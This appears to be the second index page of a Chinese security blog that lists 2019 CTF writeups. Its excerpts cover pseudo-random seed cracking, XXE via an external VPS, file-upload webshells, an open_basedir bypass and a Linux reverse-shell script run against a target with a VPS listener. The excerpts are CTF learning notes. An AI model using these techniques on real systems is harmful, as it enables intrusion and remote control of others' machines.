LiM
2019 GWCTF部分题解 2019 GWCTF部分题解
1.枯燥的抽奖 伪随机数种子猜解,这里用别人写好的工具php_mt_seed找到种子,先转换成工具容易识别的格式,然后得到种子,找到后面的数字即可。 str1='abcdefghijklmnopqrstuvwxyz0123456789ABC
2019-12-09 LiM
CTF web
2019 安洵杯部分题解 2019 安洵杯部分题解
2019 安洵杯部分题解 1.easy_web img参数可控可以读文件,文件名是两次base64加密+一次hex加密 ,读到源码为 <?php error_reporting(E_ALL || ~ E_NOTICE); header
2019-12-05 LiM
CTF web
RSA算法 RSA算法
RSA算法是一种非对称算法,即使用不同的公钥与私钥对内容加解密,在CTF crypto题目中常常出现。RSA的安全性依赖于由2个大质数相乘得到n很容易但由一个大数n拆分出2个质数非常难,RSA算法中参数有p,q,e,n,φ,d,c,m。 p
2019-11-27 LiM
crypto RSA
CTF crypto入坑笔记 CTF crypto入坑笔记
想学习一下crypto的知识,觉得很多数学算法其实挺有趣的,那么什么是crypto呢。 密码学(Cryptography)一般可分为古典密码学和现代密码学。 其中,古典密码学,作为一种实用性艺术存在,其编码和破译通常依赖于设计者和敌手的创造
2019-11-27 LiM
CTF crypto
EIS 2019 web writeup EIS 2019 web writeup
本来可以尝试着写一下的,可惜那天都在上课,这里做一下记录 ezbypass它给了一个shell,无法执行命令,要bypass open_basedir,这个上次有遇到过,写个shell在/tmp/目录下(通过利用环境变量 LD_PRELOA
2019-11-25 LiM
CTF web
NJUPT CTF 2019 web部分writeup NJUPT CTF 2019 web部分writeup
题目挺好玩的,很多不会,慢慢写还是有点思路的,学到了很多新知识。 Fake XML cookbook测试了一下,没有回显,所以进行参数实体的注入,在vps上放一个xml文件,让它加载,文件内容如下 <!ENTITY % payload
2019-11-24 LiM
CTF web
upload-libs通关笔记 upload-libs通关笔记
文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身
2019-11-19 LiM
web upload
Roarctf Web writeup Roarctf Web writeup
#写在前面,很多知识都不会,但在慢慢学习过程中积累,下面记录一下Roarctf web 题解,学习一手新知识 easy_calc看了一下页面可以计算式子,猜测后台是eval函数,看了下网络看经过哪些请求,发现请求了一个请求网址calc.ph
2019-10-28 LiM
CTF web
Syc Geek 10th web部分题解 Syc Geek 10th web部分题解
打比赛先撸一只猫查看源码,发现简单考点 <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } --> 只需GET传参cat
2019-10-26 LiM
CTF
docker简单学习及简单部署CTF题 docker简单学习及简单部署CTF题
1.什么是docker: Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口
2019-10-26 LiM
CTF docker
linux反弹shell脚本的分析 linux反弹shell脚本的分析
linux的反弹shell脚本,实战,awd都可使用,代码来自原Google安全团队,在目标机运行下面python代码,nohup python shell.py (your ip) (your port) & 在vps进行监听,n
2019-10-21 LiM
渗透
2 / 2